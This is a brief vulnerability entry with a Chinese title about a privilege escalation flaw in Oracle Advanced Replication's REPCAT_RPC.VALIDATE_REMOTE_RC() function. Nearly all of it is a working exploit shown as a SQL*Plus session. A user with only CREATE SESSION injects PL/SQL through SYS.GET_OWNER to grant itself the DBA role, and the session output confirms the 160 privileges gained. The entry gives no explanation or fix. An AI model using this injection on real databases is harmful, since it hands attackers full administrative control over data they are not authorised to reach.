Oracle Advanced Replication组件REPCAT_RPC.VALIDATE_REMOTE_RC()函数权限提升漏洞

SQL> CONNECT TESTUSER/QWERT124 Connected. SQL> SELECT PRIVILEGE FROM SESSION_PRIVS; PRIVILEGE ---------------------------------------- CREATE SESSION SQL> SET ROLE DBA; SET ROLE DBA * ERROR at line 1: ORA-01924: role 'DBA' not granted or does not exist SQL> EXEC SYS.GET_OWNER('AAAA''||DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC (USER,''VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname); execute immediate ''''declare pragma autonomous_transaction; begin execute immediate ''''''''grant dba to testuser''''''''; end;''''; end;--'',''CCCC'')||''AAAA'); PL/SQL procedure successfully completed. SQL> SET ROLE DBA; Role set. SQL> SELECT PRIVILEGE FROM SESSION_PRIVS; PRIVILEGE ---------------------------------------- ALTER SYSTEM AUDIT SYSTEM CREATE SESSION ALTER SESSION ... ... MANAGE ANY FILE GROUP READ ANY FILE GROUP CHANGE NOTIFICATION CREATE EXTERNAL JOB 160 rows selected. SQL>